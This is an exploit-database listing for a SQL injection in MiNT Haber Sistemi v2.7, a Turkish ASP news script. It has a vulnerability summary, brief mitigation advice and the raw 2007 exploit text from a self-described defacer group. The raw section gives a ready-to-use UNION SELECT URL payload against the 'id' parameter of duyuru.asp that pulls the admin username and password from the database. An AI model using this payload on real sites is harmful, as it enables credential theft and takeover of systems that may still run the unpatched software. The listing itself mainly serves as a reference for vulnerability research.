header-logo
Suggest Exploit
vendor:
MiNT Haber Sistemi
by:
chernobiLe
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: MiNT Haber Sistemi
Affected Version From: MiNT Haber Sistemi v2.7
Affected Version To: MiNT Haber Sistemi v2.7
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

MiNT Haber Sistemi v2.7 (tr) == SQL Injection Vulnerability

The MiNT Haber Sistemi v2.7 (tr) is vulnerable to SQL Injection. An attacker can exploit this vulnerability by injecting SQL code into the 'id' parameter in the 'duyuru.asp' page. By doing so, they can retrieve sensitive information such as the admin's username, password, and email address.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user inputs and use prepared statements or parameterized queries to prevent SQL injection attacks. Additionally, keeping the software up to date with the latest patches and security updates is crucial.
Source

Exploit-DB raw data:

###############################################################
#MiNT Haber Sistemi v2.7 (tr) == SQL Injection Vulnerability
#Author : chernobiLe
#Site : www.cyber-sabotage.org , www.chernobiLe.com
#Contact: info@cyber-sabotage.org
###############################################################
#Risk : High
#Download Link Of MiNT Haber Sistemi v2.7 : http://www.aspindir.com/Goster/4539


#Exploit;
#Admin Nick, Passport, Mail;
http://[SITE]/duyuru.asp?id=6+union+select+0,kul_adi,sifre+from+uye+where+id=1


#Union data Text;
#Duyuru Basligi :  USERNAME
#Duyuru Metni  :    PASSWORD

#Greetz: All CSDT ( Cyber Sabotage and Defacer ) TEAM

# milw0rm.com [2007-01-12]

Navigation

Suggest Exploit

Services By CQR